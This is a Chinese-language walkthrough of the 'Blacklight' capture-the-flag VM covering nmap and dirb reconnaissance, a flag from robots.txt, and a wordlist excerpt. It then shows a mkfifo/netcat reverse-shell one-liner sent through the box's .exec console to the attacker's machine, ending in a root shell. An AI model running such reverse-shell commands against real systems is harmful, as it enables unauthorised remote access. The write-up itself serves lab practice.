信息搜集
寻找目标
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
|
$ nmap -sS 10.0.2.1/24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-16 12:22 CST
$ nmap -A 10.0.2.7
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-16 12:24 CST
Nmap scan report for 10.0.2.7
Host is up (0.00023s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: BLACKLIGHT
MAC Address: 08:00:27:71:EE:5F (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.23 ms 10.0.2.7
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.83 seconds
$ nmap -p- 10.0.2.7
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-16 12:36 CST
Nmap scan report for 10.0.2.7
Host is up (0.000066s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
80/tcp open http
9072/tcp open unknown
MAC Address: 08:00:27:71:EE:5F (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 1.30 seconds
|
如上,80``9072
开放
网站信息
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
|
$ dirb http://10.0.2.7/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Apr 16 12:25:56 2019
URL_BASE: http://10.0.2.7/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.0.2.7/ ----
==> DIRECTORY: http://10.0.2.7/css/
==> DIRECTORY: http://10.0.2.7/fonts/
==> DIRECTORY: http://10.0.2.7/footer/
==> DIRECTORY: http://10.0.2.7/img/
+ http://10.0.2.7/index.html (CODE:200|SIZE:1759)
==> DIRECTORY: http://10.0.2.7/javascript/
==> DIRECTORY: http://10.0.2.7/js/
+ http://10.0.2.7/robots.txt (CODE:200|SIZE:40)
+ http://10.0.2.7/server-status (CODE:403|SIZE:296)
---- Entering directory: http://10.0.2.7/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.0.2.7/fonts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.0.2.7/footer/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.0.2.7/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.0.2.7/javascript/ ----
==> DIRECTORY: http://10.0.2.7/javascript/jquery/
---- Entering directory: http://10.0.2.7/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.0.2.7/javascript/jquery/ ----
+ http://10.0.2.7/javascript/jquery/jquery (CODE:200|SIZE:268026)
-----------------
END_TIME: Tue Apr 16 12:26:01 2019
DOWNLOADED: 13836 - FOUND: 4
|
有个robots.txt
User-agent: *
flag1.txt
blacklight.dict
flag1.txt
{flag1:fc4c7223964a26b152823d14f129687207e7fe15}
9072. The secret is at home.```
提示9072端口。
blacklight.dict
```code
000000
111111
11111111
112233
121212
123123
123456
1234567
12345678
123456789
131313
232323
654321
666666
696969
777777
7777777
8675309
987654
aaaaaa
abc123
abcdef
abgrtyu
access
access14
action
albert
alberto
alexis
alejandra
alejandro
amanda
.......```
看起来好像是账号之类的,暂时放着。
### 获取权限
用上面搜集到的9072端口,使用NC链接。
```bash
$ nc 10.0.2.7 9072
BLACKLIGHT console mk1. Type .help for instructions
.help
.readhash - Get one step closer
.exec <cmd> - Execute commands
.quit - Exit the server
.readhash
b5f4723bd6df85b54b0905bd6d734be9ef1cc1eb977413a932a828b5c52ef5a6
You have one more command until the server shuts down. Choose wisel
$ nc 10.0.2.7 9072
BLACKLIGHT console mk1. Type .help for instructions
.help
.readhash - Get one step closer
.exec <cmd> - Execute commands
.quit - Exit the server
You have one more command until the server shuts down. Choose wisely!```
发现很难执行有效命令,现在有两个思路,绕过再反弹一个NC。
```bash
nc -lvp 4443
.exec rm /tmp/icekam;mkfifo /tmp/icekam;cat /tmp/icekam|/bin/sh -i 2>&1|nc 10.0.2.5 4443 >/tmp/icekam
10.0.2.7: inverse host lookup failed: Unknown host
connect to [10.0.2.5] from (UNKNOWN) [10.0.2.7] 43776
/bin/sh: 0: can't access tty; job control turned off
传统read无法反弹,使用rm反弹成功,
切换bash模式
1
2
3
4
5
6
|
python -c "import pty;pty.spawn('/bin/bash')"
root@blacklight:~## id
id
uid=0(root) gid=0(root) groups=0(root)
root@blacklight:~#
|
总结
这个环境比较基础,可以加强下二次反弹NC的使用。